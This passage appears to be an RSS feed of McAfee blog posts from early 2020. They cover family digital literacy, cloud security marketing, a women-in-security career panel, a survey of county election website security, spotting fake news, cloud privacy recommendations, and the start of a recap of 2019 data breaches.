  5. Always attribute content. The internet is a big place that showcases a variety of exciting, valuable, original content. However, that content doesn’t display a visible price tag. Therefore, great content is often re-shared without giving credit to the author or creator. Discuss: Talk about the value of a person’s art, writing, photos, and research. Find examples of how to correctly cite sources and share them with your child. Follow up by checking your child’s social feeds to see that sources are being cited correctly. Coach them to add attribution when needed. Additional resource: Go through this free, 5-day course for families from CyberWise on Digital Citizenship.
  6. Always consider your digital footprint. A digital footprint is anywhere we’ve personally connected online. These small digital breadcrumbs — when added together and viewed as a whole — are what others see, and consequently, believe about us. The parts of our footprint include social profiles we create, comments we leave, tweets, photos, or any time others mention us online. Ask: Is this photo something that will add or subtract value from my digital footprint? Will this post, photo, or tweet affect my chances of getting into college or competing for a job? Will I be proud of this post five years from now? Additional Resource: Author Sue Scheff’s blog post Online Reputation Reboot for Teens.
  7. Stay current with new technology. It’s more so adults than kids that need to make a larger commitment to new technology. Part of digital literacy is keeping up with current technology and preparing for future technology. By making this learning investment, we can better understand the origin of new technologies such as AI and spinoff trends such as deep fakes. Educating ourselves on the nuances of tools such as vlogs, audio, video, AR, AI, 3D printing, and machine learning is essential to navigating the current and future landscape. Additional resources: Consider subscribing to magazines online to get you rolling: TechCrunch.comTheNextWeb.comDigitalTrends.com.

Like other areas that require time and consistency to develop, your child’s digital literacy skills will take time to mature. Author Tim Elmore say on his Growing Leaders blog, when it comes to raising kids to thrive in the digital era, a parent’s role is clear, “We must clearly convey values and virtues like resilience, discipline, integrity, problem-solving skills, good communication, commitment, and responsibility. That’s the critical role we can play.”

So, have fun with these conversations always recognizing that your influence matters. Look for real-life digital literacy examples to talk about, and don’t forget to celebrate the wins you see your kids achieving online.

The post 7 Conversations to Help Build Up Your Family’s Digital Literacy Skills appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/family-safety/7-conversations-to-help-develop-your-familys-digital-literacy-iq/feed/ 0
Leading with Cloud Security, Empowering Enterprise Innovation https://www.mcafee.com/blogs/enterprise/cloud-security/leading-with-cloud-security-empowering-enterprise-innovation/ https://www.mcafee.com/blogs/enterprise/cloud-security/leading-with-cloud-security-empowering-enterprise-innovation/#respond Thu, 06 Feb 2020 16:43:47 +0000 /blogs/?p=98462

Call it ancient history—2012. When sanctioned apps ruled the day. Shadow IT lurked, well, in the shadows. And protecting the enterprise meant locking down the cloud. Then, true to the principles of Darwinian evolution, enterprises began to adapt to the new natural order. Let the record show, 97% of enterprises in 2020 rely on the […]

The post Leading with Cloud Security, Empowering Enterprise Innovation appeared first on McAfee Blogs.

]]>

Call it ancient history—2012. When sanctioned apps ruled the day. Shadow IT lurked, well, in the shadows. And protecting the enterprise meant locking down the cloud. Then, true to the principles of Darwinian evolution, enterprises began to adapt to the new natural order.

Let the record show, 97% of enterprises in 2020 rely on the cloud for some combination of SaaS, IaaS, or PaaS solutions to power their enterprise. Which is why McAfee’s cloud-led strategy to serve the enterprise is centered on an organization’s ability to protect data and workloads, whether in use, in motion, or at rest. President and CEO of McAfee, Peter Leav, puts it this way, “We are in a new world. There is simply more. More networks, more endpoints, more users, more applications, more data, more cloud.”

SaaS solutions make the enterprise agile, whether via collaboration tools like Slack or Box, relationship management and marketing automation technologies like Salesforce, or technical management from companies like ServiceNow. Agility is the name of the game, and the enterprise that moves fastest wins the day. And with IaaS and PaaS enabled by the likes of AWS, Microsoft Azure, and Google Cloud Platform, the evolution of the enterprise only accelerates.

McAfee is proud to lead at the front of the cloud revolution. Our award-winning MVISION Cloud created the Cloud Access Security Broker (CASB) category nearly a decade ago. And we’ve only built on our successes in the cloud from there, including 14 seminal patents (3X more than our nearest competitor). The Analyst community agrees—It’s gratifying to be named a Leader in reports by three influential analyst firms.

We built on our leadership in 2019 when McAfee acquired NanoSec, an innovator in zero-trust application visibility and security for multi-cloud environments. NanoSec enables organizations to secure applications once and run them on any cloud infrastructure at scale. But there’s more. NanoSec also provides McAfee cloud users the latest in container security. When you add NanoSec’s capabilities to McAfee’s existing cloud security portfolio, you can see that we now bring consistent data security, threat protection, governance, and compliance to virtually every element and every environment of the cloud.

Further proof of our cloud-led momentum unfolded in 2019 as MVISION Cloud was certified as a natively-integrated cloud solution for consumers, businesses, and governments by global leaders in the IaaS and PaaS arena. Specifically, McAfee was recognized by AWS as a Well-Architected Partner for our CASB and IPS solutions, as well as a Security Competency Partner for CASB, all to offer the same security controls available in a private data center. What’s more, AWS called out McAfee as an ISV Accelerator Partner for CASB, and an Amazon RDS Partner for McAfee Database Security. Microsoft likewise recognized our CASB leadership with its integration of MVISION Cloud with MS Teams. Microsoft and McAfee also partner through Office 365 Collaboration Controls to ensure security and compliance, and our virtual Advanced Threat Defense is on the Azure Marketplace. In November, Google Cloud Platform (GCP) announced MVISION Cloud’s integration into GCP for visibility and control of cloud resources. And McAfee is trusted by the U.S. government as a FedRAMP Moderate Authorized and FedRAMP Ready for FedRAMP High partner via our MVISION Cloud, Extended Threat Protection, Cloud Value Maturity, and End User Remediation solutions. We also enjoy FedRAMP Moderate In-Process status for MVISION Endpoint on the FedRAMP Marketplace.

Still, as rewarding as it is to be recognized by partners like AWS, MS, GCP, and FedRAMP, our customers’ successes are the real story. WEG is a perfect example. The multi-national manufacturing company headquartered in Brazil currently deploys McAfee® Client Proxy, McAfee® MVISION Cloud for Office 365, McAfee® Web Gateway, and McAfee® Web Gateway Cloud Service. This unified approach to cloud helps address WEG’s three biggest cybersecurity concerns, namely secure internet access, secure cloud access, and secure intellectual property. Pierre Pereira Rodrigues, CISO for WEG, puts it this way, “Our business users have been pushing for greater cloud adoption. Rather than wearing the ‘No, you can’t’ cybersecurity hat, we strive to say, ‘Let’s figure out how you can.’” The result is proof that a business can be innovative and not sacrifice security.

Maka Guerrero, Senior IT Security Analyst at Pacific Dental Services says, “MVISION Cloud allows us to have more flexibility on the fly than any other CASB on the market. The approach that McAfee is taking to secure the cloud aligns really well with our other partners like AWS and what they are trying to achieve, and it makes sense for our business goals.” A provider of administrative support to dental offices across the U.S., PDS deploys MVISION Cloud for AWS, MVISION Cloud for Box, MVISION Cloud for Custom Apps, MVISION Cloud for Office 365, MVISION Cloud for Salesforce, and MVISION Cloud for Shadow IT.

It’s customers like these—frontline defenders of this new digital age—who are writing tomorrow’s history, today. McAfee is proud to stand at their side even as our adversary pushes the limits of an equally Darwinian transformation of the threatscape.

With the scale, speed, and agility of the cloud on our side, let the new world continue to evolve.

The post Leading with Cloud Security, Empowering Enterprise Innovation appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/enterprise/cloud-security/leading-with-cloud-security-empowering-enterprise-innovation/feed/ 0
McAfee’s Women in Security Offer New Grads Career Insights https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/mcafees-women-in-security-offer-new-grads-career-insights/ https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/mcafees-women-in-security-offer-new-grads-career-insights/#respond Thu, 06 Feb 2020 15:00:55 +0000 /blogs/?p=98447

Launching your career is an exciting milestone, one that can also be nerve-wracking though. Chances are questions like What should I look for in a company? or How do I become a leader? have crossed your mind. While we can’t answer all your questions, our Women in Security (WISE) employee resource group offered to host […]

The post McAfee’s Women in Security Offer New Grads Career Insights appeared first on McAfee Blogs.

]]>

Launching your career is an exciting milestone, one that can also be nerve-wracking though. Chances are questions like What should I look for in a company? or How do I become a leader? have crossed your mind.

While we can’t answer all your questions, our Women in Security (WISE) employee resource group offered to host a panel discussion to encourage the next generation of women in tech to pursue their passions. Students asked questions about what it’s like to work in the technology industry, the importance of mentorship, overcoming imposter syndrome, achieving success early in career, and about life here at McAfee.

Here’s how they responded:

How did you build success early in your career?

Amanda, Data Scientist: “I quickly found that learning never stops. While a degree helps you build the foundation, real knowledge comes from exposure and experience. Take every challenge and opportunity thrown your way. Early in your career is the best time to take risks and just say yes.”

Flavia, IT Manager: “In everything I do, I keep three principles at the forefront: communication, awareness, and accountability. If you have these skills, you will succeed at any role.”

JoAnne, Cloud Application Engineer: “When it’s early in your career, you can build success by trying new tasks outside of your normal job duties. Do your best and take advantage of each opportunity. And remember, have fun along the way.”

How do you handle imposter syndrome?

Bolade, Sales Engineer: “Everyone faces self-doubt. As a woman, and a woman of a diverse background, I’ve faced imposter syndrome. You must fight through it and recognize that it’s only the voice in your head. To help you silence the doubt, reach out to your network and your mentor. Mentorship is an important part in building your confidence.”

Crystal, Talent Enablement Leader: “First, recognize that any negative thoughts are just that—thoughts. Acknowledge them and then instead of letting them make you feel unqualified, use them to empower you. Take action to fill any areas of improvement. You will face adversity in your career, but take them as lessons learned, gain perspective, and then move forward.”

How do you chart a path to leadership?

Crystal, Talent Enablement Leader: “Take time to research the role you want to be in. What will it take to get there? Know it’s not always a linear path though. It’s okay to take steps backwards or sideways when they help you achieve your long-term plan. Humble yourself for the journey.”

Sonia, Sr. Product Marketing Manager: “Start with a vision board and work towards the small wins to help you reach your goals. Also, keep in mind research tells us men and women approach opportunities differently. As women, we wait until we feel 100 percent qualified for the job, while men apply believing they will learn on the job. My advice to all women seeking any role and leadership is to just go for it—you are capable. Recognizing you can and will learn on the job is an important part of your success.”

Why McAfee?

Bolade, Sales Engineer: “The people. Not long after I started at McAfee, I took on another important role—motherhood. My leadership was incredibly supportive and when I returned from leave, I was promoted within six months. You can’t get where you want to be without good people to help you get there. I’ve found the supportive team I have at McAfee is critical to my fulfilment both personally and professionally.”

Sonia, Sr. Product Marketing Manager: “Here, I feel like I have family. I love how everyone always exchanges hellos in the elevator. Something small like this makes a big difference in your day. Working with a great team in a great environment is one of the most important things that helps you succeed, and I’ve found that at McAfee.”

Interested in building your career at company that helps women thrive? Search our openings!

The post McAfee’s Women in Security Offer New Grads Career Insights appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/mcafees-women-in-security-offer-new-grads-career-insights/feed/ 0
Election Website Security: Protect Your Vote in 2020 https://www.mcafee.com/blogs/consumer/election-website-security/ https://www.mcafee.com/blogs/consumer/election-website-security/#respond Tue, 04 Feb 2020 05:01:43 +0000 /blogs/?p=98296

The 2020 U.S. presidential primaries are right around the corner. As people gear up to cast their ballots for party candidates, they may not realize that website security shortcomings could leave the U.S. elections susceptible to digital disinformation campaigns or possibly worse seeking to influence and /or manipulate the democratic process. McAfee recently conducted a […]

The post Election Website Security: Protect Your Vote in 2020 appeared first on McAfee Blogs.

]]>

The 2020 U.S. presidential primaries are right around the corner. As people gear up to cast their ballots for party candidates, they may not realize that website security shortcomings could leave the U.S. elections susceptible to digital disinformation campaigns or possibly worse seeking to influence and /or manipulate the democratic process.

McAfee recently conducted a survey of county websites and county election administration websites in the 13 states projected as battleground or “tossup” states in the U.S. presidential elections in November. According to the survey results, the majority of these websites lacked official U.S. government .GOV website validation and HTTPS website security measures to prevent hackers from launching fake websites disguised as legitimate county government sites.

Got .GOV?

You might be wondering what the significance of a .gov website domain is. Well, a .gov website name requires that buyers submit evidence to the U.S. government that they truly are buying these names on behalf of legitimate local, county, or state government entities.

On the other hand, a website using a .COM, .NET, .ORG, or .US can be purchased by anyone with a credit card from any number of legitimate website domain vendors. The lack of a .GOV in a website name means that no controlling government authority has validated that the website is a legitimate government site.

HTTPS: browse the web securely

In the same vein as a .GOV web domain, HTTPS and a lock icon in the address of a website helps establish its validity. When a visitor sees these icons, it means that their browser has made a secure connection with the website, which means the website and the user can be confident of who they are sharing information with.

This means that any personal voter registration information that a user shares with the site cannot be intercepted and stolen by hackers while they are on the site. Additionally, HTTPS and a lock icon tell the user that they cannot be re-routed without their knowledge to a different site.

How this could impact elections

Hackers typically look to carry out their attacks with the least amount of effort and the fewest resources. Instead of hacking into local voting systems and changing vote counts, hackers could conduct a digital disinformation campaign to influence voter behavior during the elections. These attacks would seek to suppress or disrupt the voting process by setting up bogus websites with official sounding domains and related email addresses. From there, hackers could use those bogus email addresses to send mass email blasts intended to feed unsuspecting voter email recipients false information on when, where, and how to vote.

Example disinformation email:

On top of that, social media promotions could be used to lure voters to the fake websites and provide them with the same false information.

By telling voters that they should register to vote in the wrong places, or merely vote at the wrong times, the hackers could misdirect, confuse, and frustrate voters on election day. This could ultimately impact vote counts or at least undermine voter confidence in the electoral process.

Survey results

McAfee’s survey of the external security measures for county election websites included Arizona, Florida, Georgia, Iowa, Michigan, Minnesota, Nevada, New Hampshire, North Carolina, Ohio, Pennsylvania, Texas, and Wisconsin. Together, these states account for 201 of the 270 electoral votes required to win the U.S. presidential election.

Our research found that Minnesota and Texas ranked the lowest among the surveyed states in terms of .GOV county coverage with 4.6% and 5.1% coverage respectively. Arizona ranked the highest in .GOV county coverage with 66.7%. Yet, this still left a third of the state’s counties uncovered.

Texas ranked the lowest in terms of HTTPS protection with only 22.8% of its county websites protected. Arizona again led in county HTTPS protection with 80.0%, followed by Nevada (75.0%), Iowa (70.7%), Michigan (65.1%), and Wisconsin (63.9%). Again, these “leader” states still lacked HTTPS coverage for approximately a third of their counties.

Tips to help secure your vote

So, what can citizens do to help protect their votes and the electoral system overall leading up to the 2020 election? Check out these tips to securely cast your ballot:

  • Stay informed. Remind yourself to confirm the site you are visiting is a .GOV website and that HTTPS security protection is in place to ensure that the information accurate and is safe
  • Look out for suspicious emails. Carefully scrutinize all election related emails. An attacker seeking to misinform can use phishing-techniques to accomplish their objective.  McAfee’s general warnings related to phishing emails (e.g. here), where an attacker can create emails that look as if they come from legitimate sources are applicable.
  • Go directly to the source. If in doubt, visit your state’s elections website to receive general election information on voter registration and contact information for your county’s election officials. Contact the local county officials to confirm any election instructions you receive via email, social media, or websites leading up to Election Day.
  • Keep it old school. Trust the official voting literature sent through the traditional mail first, as the U.S. Postal Service is the primary channel state and local governments use to send out voting information.

Stay up to date

To stay on top of McAfee news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Election Website Security: Protect Your Vote in 2020 appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/election-website-security/feed/ 0
U.S. Battleground County Website Security Survey https://www.mcafee.com/blogs/other-blogs/mcafee-labs/u-s-battleground-county-website-security-survey/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/u-s-battleground-county-website-security-survey/#respond Tue, 04 Feb 2020 05:00:57 +0000 /blogs/?p=98431

Today McAfee released the results of a survey of county websites and county election administration websites in the 13 states projected as battleground states in the 2020 U.S. presidential elections. We found that significant majorities of these websites lacked the official government .GOV website validation and HTTPS website security measures to prevent malicious actors from […]

The post U.S. Battleground County Website Security Survey appeared first on McAfee Blogs.

]]>

Today McAfee released the results of a survey of county websites and county election administration websites in the 13 states projected as battleground states in the 2020 U.S. presidential elections. We found that significant majorities of these websites lacked the official government .GOV website validation and HTTPS website security measures to prevent malicious actors from launching copycat web domains posing as legitimate county government sites.

These shortcomings could make it possible for malicious actors to spread false and misleading election information through mass bulk email and website promotion campaigns that could suppress, misdirect, or otherwise disrupt Election Day proceedings in such a way that they could impact the number of votes cast and, ultimately, perhaps impact the results of the 2020 U.S. elections.

Why .GOV & HTTPS?

Whereas websites using .COM, .NET, .ORG, and .US in their names are easily accessible to anyone with a credit card from website domain vendors such as GoDaddy.com, acquiring a .GOV website name requires that buyers submit evidence to the U.S. government that they truly are buying these names on behalf of legitimate local, county, or state government entities.

The lack of .gov in a website name means that no controlling government authority has validated that the website in question is legitimate.

When website visitors see the HTTPS and a lock icon in the address of a website they are visiting, this means that their browser has made a secure connection with that website through a technology called Secure Sockets Layer (SSL). While SSL sounds technical, the security it delivers is easy to understand. These signifiers simply tell visitors that any personal voter registration information that they share with those websites is encrypted and cannot be intercepted and stolen by hackers while they are visiting the site.

 

Additionally, and more importantly to the election disinformation issue, they also tell visitors that they cannot be re-routed against their will from legitimate government websites to other websites pretending to be government websites.

What McAfee’s survey found

McAfee’s January 2020 survey researched states projected by U.S. election prognosticators to be pivotal in determining the victor in the 2020 Presidential Elections. States surveyed include Arizona, Florida, Georgia, Iowa, Michigan, Minnesota, Nevada, New Hampshire, North Carolina, Ohio, Pennsylvania, Texas, and Wisconsin. Together, these states account for 201 of the 270 electoral votes required to win the U.S. presidential election.

State counties lacking .GOV validation

Of the 1,117 counties in the survey group, 83.3% of their websites lack .GOV validation. Minnesota ranked the lowest among the surveyed states in terms of .GOV website validation with 95.4% of counties lacking U.S. government certification. Other states severely lacking in .GOV coverage included Texas (94.9%), New Hampshire (90.0%), Michigan (89.2%), Iowa (88.9%), Nevada (87.5%), and Pennsylvania (83.6%).

Arizona had the highest percentage of main county websites validated by .GOV with 66.7% coverage, but even this percentage suggests that a third of the Grand Canyon State’s county websites are unvalidated and that hundreds of thousands of voters could still be subjected to disinformation schemes.

State counties lacking HTTPS protection

McAfee’s survey found that 46.6% of county websites lack HTTPS encryption. Texas ranked the lowest in terms of encryption with 77.2% of its county websites failing to protect citizens visiting these web properties. Other states with counties lacking in encryption included Pennsylvania (46.3%), Minnesota (42.5%), and Georgia (38.4%).

Assessment of Iowa and New Hampshire

In Iowa, 88.9% of county websites lack .GOV validation, and as many as 29.3% lack HTTPS encryption. Ninety percent of New Hampshire’s county websites lack .GOV validation, and as many as 30% of the Granite State’s counties lack encryption.

Inconsistent naming standards

McAfee’s research found that some states attempted to establish standard naming standards, such as www.co.[county name].[two-letter state abbreviation].us. Unfortunately, these formats were followed so inconsistently that a voter seeking election information from her county website cannot be confident that a web domain following such a standard is indeed a legitimate site.

Easy-to-remember naming formats

McAfee found 103 cases in which counties set up easy-to-remember, user-friendly domain names to make their election information easier to remember and access for the broadest possible audience of citizens. Examples include www.votedenton.com, www.votestanlycounty.com, www.carrollcountyohioelections.gov, www.voteseminole.org, and www.worthelections.com. While 93 of these counties (90.2%) protected voters visiting these sites with encryption, only two validated these special domains and websites with .GOV. This suggests that malicious parties could easily set up numerous websites with similarly named domains to spoof these legitimate sites.

.GOV and elections

The lack of .gov matters because, without an official government body validating whether websites truly belong to the government entities they claim, it’s possible for malicious actors to spoof legitimate government sites with fraudulent websites.

If a malicious foreign actor can spoof government websites, he can send hundreds of thousands of emails to voters and use both those emails and the websites to which they are tied to send voters information on the wrong polling places, phony voter registration processes or requirements (barriers), or other incorrect voting instructions that could suppress, misdirect, or otherwise disrupt a key county’s electorate from voting.

If the malicious actor can launch such a digital disinformation campaign close enough to election day, he could reach a critical mass of voters. If he does so before county and state officials become aware of the campaign, it could be very difficult for the officials to counter the disinformation before voter behavior is impacted.

If the actor can successfully disrupt the voting behavior of just tens of thousands of citizens in these key states, their votes may not be counted or their confidence in the validity of election results and even legitimacy of the democratic process overall could be badly shaken.

Ultimately, if a malicious actor seeks to undermine confidence in America’s system of government, such a digital disinformation campaign can succeed in damaging confidence in the electoral process, even if he cannot succeed in impacting actual votes.

Ohio’s Strategy for transitioning to .GOV

While only 19.3% of Ohio’s 88 county main websites have .GOV validation, the state leads McAfee’s survey with 76.1% of county election websites and webpages validated by .GOV certification.

This leadership position appears to be the result of a state-led initiative to transition county election-related content to .GOV validated web properties. A majority of counties have subsequently transitioned their main county websites to .GOV domains, their election-specific websites to .GOV domains, or their election-specific webpages to Ohio’s own .GOV-validated https://ohio.gov/ domain (i.e. https://www.boe.ohio.gov/vanwert/). See here for a complete list of Ohio county election websites.

Such a .GOV transition strategy constitutes an interim solution until more comprehensive efforts are made at the state and federal government level through initiatives such as The DOTGOV Act of 2020. This legislation would require the Department of Homeland Security (DHS) to support .GOV adoption for local governments with technical guidance and financial support.

Please see the following for more information on this subject:

 

 

 

The post U.S. Battleground County Website Security Survey appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/u-s-battleground-county-website-security-survey/feed/ 0
Spotting Fake News: Teaching Kids to be Responsible Online Publishers https://www.mcafee.com/blogs/consumer/family-safety/spotting-fake-news-teaching-kids-to-be-responsible-online-publishers/ https://www.mcafee.com/blogs/consumer/family-safety/spotting-fake-news-teaching-kids-to-be-responsible-online-publishers/#respond Mon, 03 Feb 2020 21:44:12 +0000 /blogs/?p=98345 fake news

Editor’s note: This is part II in a series on Fake News. Read part I, here. Kids today are not equipped to deal with the barrage of digital information coming at them every day. Add to that, the bulk of information that may be fake, misleading, or even malicious. So how do we help kids […]

The post Spotting Fake News: Teaching Kids to be Responsible Online Publishers appeared first on McAfee Blogs.

]]>
fake news

Editor’s note: This is part II in a series on Fake News. Read part I, here.

Kids today are not equipped to deal with the barrage of digital information coming at them every day. Add to that, the bulk of information that may be fake, misleading, or even malicious. So how do we help kids become more responsible for the content they share online?

We do it one conversation at a time.

When it comes to the mounting influence of fake news, it’s easy to point the finger at the media, special interest groups, politicians, and anyone else with an agenda and internet access. While many of these groups may add to the problem, each one of us plays a role in stopping it.

What’s our role?

We, the connected consumer, now play such a significant role in how content is created and disseminated, that a large part of the solution comes down to individual responsibility — yours and mine.

The shift begins with holding ourselves accountable for every piece of content we read, create, or share online. That shift gains momentum when we equip our kids to do the same.

Teach personal responsibility. Start the conversation around personal responsibility early with your kids and keep it going. Explain that every time we share fake news, a rumor, or poorly sourced material, we become one cog in the wheel of spreading untruths and even malicious fabrications. We become part of the problem. Challenge your child to become a trustworthy, discerning source of information as opposed to being viewed by others as an impulsive, unreliable source.

Discuss the big picture. Fake news or misleading content isn’t just annoying; it’s harmful in a lot of other ways. Misinformation undermines trust, causes division, can spark social unrest, and harm unity. More than that, fake news edges out helpful, factual, content designed to educate and inform.

Be aware of confirmation bias. Confirmation bias is gravitating toward ideas, people, and content that echoes our spiritual, social, political, or moral points of view. Confirmation bias tempts us to disregard information that opposes our ideology. While confirmation bias is part of our human nature, left unchecked, it can be an obstacle to learning factual information.

Chill, don’t spill. Fake news is designed to advance a personal agenda. This is especially true during times of social tension when tempers are running high. Don’t take the emotional bait. Exercise discernment. Before sharing, read legitimate news sources that offer balanced coverage, so the story you share or opinion you express is based on accurate information.

Be a free thinker. Our kids have grown up in a world where ‘like’ and ‘share’ counts somehow equate to credibility. Encourage kids to break away from the crowd and have the courage to be free, independent thinkers.

Challenge content by asking:

  • Do I understand all the points of view of this story?
  • What do I really think about this topic or idea?
  • Am I overly emotional and eager to share this?
  • Am I being manipulated by this content?
  • What if I’m wrong?

Question every source. Studies show that people assume that the higher something ranks in search results, the more factual or trustworthy the information is. Wrong. Algorithms retrieve top content based on keywords, not accuracy. So, dig deeper and verify sources.

5 ways to spot fake news

1. Look closely at the source. Fake news creators are good at what they do. While some content has detectable errors, others are sophisticated and strangely persuasive. So, take a closer look. Test credibility by asking:

  • Where is the information coming from? 
  • Is this piece satire?
  • Is the author of the article, bio, and website legitimate? 
  • Are studies, infographics, and quotes appropriately attributed?
  • Is the URL legitimate (cnn.comvs. cnn.com.co)?
  • Are there red flags such as unknown author, all capital letters, misspellings, or grammar errors?

2. Be discerning with viral content. Often a story will go viral because it’s so unbelievable. So pause before you share. Google the story’s headline to see if the story appears in other reliable publications.

3. Pay attention to publish dates, context. Some viral news items may not be entirely false, just intentionally shared out of context. Fake news creators often pull headlines or stories from the past and present them as current news to fit the desired narrative.

4. Beware of click-bait headlines. A lot of fake news is carefully designed with user behavior in mind. A juicy headline leads to a false news story packed with even more fake links that take you to a product page or, worse, download malware onto your computer, putting your data and privacy at risk. These kinds of fake news scams capitalize on emotional stories such as the recent tragic death of basketball great Kobe Bryant.

5. Verify information. It takes extra effort, but plenty of sites exist that can help you verify a piece of information. Before sharing that a piece of content, check it out on sites like:

  • Snopes.com
  • Factcheck.com
  • Politifact.org
  • Opensecrets.org
  • Truthorfiction.com
  • Hoaxslayer.com

While fake news isn’t a new phenomenon, thanks to technology’s amplification power, it’s reached new levels of influence and deception. This social shift makes it imperative to get in front of this family conversation as soon as possible especially since we’re headed into an election year.

The post Spotting Fake News: Teaching Kids to be Responsible Online Publishers appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/family-safety/spotting-fake-news-teaching-kids-to-be-responsible-online-publishers/feed/ 0
Top 10 Cloud Privacy Recommendations for Businesses https://www.mcafee.com/blogs/enterprise/cloud-security/top-10-cloud-privacy-recommendations-for-businesses/ https://www.mcafee.com/blogs/enterprise/cloud-security/top-10-cloud-privacy-recommendations-for-businesses/#respond Mon, 03 Feb 2020 13:00:23 +0000 /blogs/?p=98341

In the corporate world, privacy refers to employee/business data as well as customer/supplier data—you must safeguard both of them. Laws such as CCPA and GDPR, not to mention vertical market regulations, make it clear how important this issue is to regulators, who take into account the security tools in use and their settings during investigations. […]

The post Top 10 Cloud Privacy Recommendations for Businesses appeared first on McAfee Blogs.

]]>

In the corporate world, privacy refers to employee/business data as well as customer/supplier data—you must safeguard both of them. Laws such as CCPA and GDPR, not to mention vertical market regulations, make it clear how important this issue is to regulators, who take into account the security tools in use and their settings during investigations. (Fines can be significantly lower if tools are well deployed.)

As businesses continue to accelerate to the cloud, there’s no better time to review all aspects of cloud data collection, use, storage, transfer and processing.

  1. Investigate shadow IT, unsanctioned cloud providers and THEIR security

The organization’s data can easily leak via shadow cloud services; for example, users converting a PDF of the employee phone list, translating a project plan, or using a cloud-based presentation tool or unmanaged collaboration services. The corporation is responsible for data loss from its employees, no matter how it occurs. So IT needs visibility into all cloud services, even those set up by individual users or small groups. Once you have a comprehensive picture of unsanctioned cloud usage, this information should be shared with the purchasing team to help them decide which services to approve.

  1. Integrate with global SSO

Global single sign-on services can ensure that users’ access is removed from all services when they leave the organization, as well as reduce the risk of data loss from password reuse. In a non-SSO service, users often call the helpdesk team when they’ve forgotten their passwords , so SSO has the added benefit of reducing call volume.

  1. Work with GRC and workshop how users use cloud

GRC (governance, risk and compliance) should be brought in to help define cloud use policies. Often, they are unsure how clouds are being used and what data is being uploaded, and therefore policies are general. Create a team including users, GRC and IT security to define policies for the real world by reviewing the possible actions that can be taken in each particular cloud service and ensure policies are defined for all eventualities.

  1. Review IaaS – Don’t assume DevOps did everything right

The fastest-growing area of cloud is IaaS—AWS, Azure and Google Cloud Platform. Here, it is very easy for developers to misconfigure the settings and leave data open to attackers.  Technology is needed to check for all IaaS services (we always find more than people believe they have) and their settings—ideally, this would be a system that can automatically change settings to secure options.

  1. Keep up to date with technology—serverless, containers, cloud email services, etc.

The cloud includes many technologies that are constantly evolving; therefore, security needs to change too. Developers are often at the forefront of technological advances—bringing in code from GitHub, running container systems that only live for a few minutes (even this isn’t too short a time to require safeguarding) and more. IT security needs to be in partnership with the development teams and deploy technologies to defend against the latest threats.

  1. Integrate with web gateway and DLP—don’t lose security as you move to cloud

After investing time and money over the last decade on security, you don’t want to lose that investment when moving to the cloud. As systems and data are moved skyward, you should deploy technologies that can integrate with your existing services and technology. For example, you shouldn’t have two different DLP models depending on the computing services used by your employees. Deploy systems that can integrate with each other, preferably with a single-pane-of-glass management system.

  1. Don’t assume CSPs will keep your logs forever

If the worst happens, you need to investigate the history of a data loss incident. CSPs will rarely save data logs forever—refer to your contract to find out how long they keep logs, and consider having your own logs so that forensic investigations can be executed even if the original data loss incident was some time ago.

  1. Consider differential policies based on location, device, etc.

Once data is in the cloud, the whole idea is to facilitate global working. Is that always appropriate? For example, what if an employee wants to download a sensitive corporate document via a cloud service to an unmanaged device? Consider the situations your employees will encounter, and form policy that provides the maximum amount of security required while causing the least amount of disruption possible.

  1. Promote the clouds you DO like to your users

Carrots work better than sticks to train users. Don’t just block the services you don’t like, promote widely the cloud services you approve of, those that conform to your security needs, your performance indicators and capabilities. Promote them via the intranet, blogs and internal marketing, and redirect requests to unsupported services back to those you like.

  1. Privacy and security is everyone’s responsibility: Bring in other departments and users

Perhaps the last recommendation should be the first: Use every method available to train users, but before you do, work with those users and their representatives to define appropriate policies. The aim is to encourage users to use cloud services that are not only safe, but will allow them to be as productive as possible. The users themselves typically have great ideas of the services they’d like to use, why and how, so bring them in to help define the policies and work together with GRC.

Here’s to successful and secure cloud deployment, and to keeping your users and customer personal data as secure as you can in 2020 and beyond.

For more information, take a look at our additional resource on safeguarding your personal data in the cloud . 

The post Top 10 Cloud Privacy Recommendations for Businesses appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/enterprise/cloud-security/top-10-cloud-privacy-recommendations-for-businesses/feed/ 0
Security Lessons From 2019’s Biggest Data Breaches https://www.mcafee.com/blogs/consumer/consumer-threat-notices/2019-data-breaches/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/2019-data-breaches/#respond Wed, 29 Jan 2020 22:44:36 +0000 /blogs/?p=98325

2019 already feels like it’s worlds away, but the data breaches many consumers faced last year are likely to have lasting effects. As we look back on 2019, it’s important to reflect on how our online security has been affected by various threats. With that said, let’s take a look at the biggest breaches of […]

The post Security Lessons From 2019’s Biggest Data Breaches appeared first on McAfee Blogs.

]]>

2019 already feels like it’s worlds away, but the data breaches many consumers faced last year are likely to have lasting effects. As we look back on 2019, it’s important to reflect on how our online security has been affected by various threats. With that said, let’s take a look at the biggest breaches of the year and how they’ve affected users everywhere.

Capital One breach

In late July, approximately 100 million Capital One users in the U.S. and 6 million in Canada were affected by a breach exposing about 140,000 Social Security numbers, 1 million Canadian Social Insurance numbers, 80,000 bank account numbers, and more. As one of the 10 largest banks based on U.S. deposits, the financial organization was certainly poised as an ideal target for a hacker to carry out a large-scale attack. The alleged hacker claimed that the data was obtained through a firewall misconfiguration, allowing for command execution with a server that granted access to data in Capital One’s storage space.

Facebook breach

In early September, a security researcher found an online database exposing 419 million user phone numbers linked to Facebook accounts. The exposed server was left without password protection, so anyone with internet access could find the database. The breached records contained a user’s unique Facebook ID and the phone number associated with the account. In some instances, the records also revealed the user’s name, gender, and location by country.

Collection #1 breach

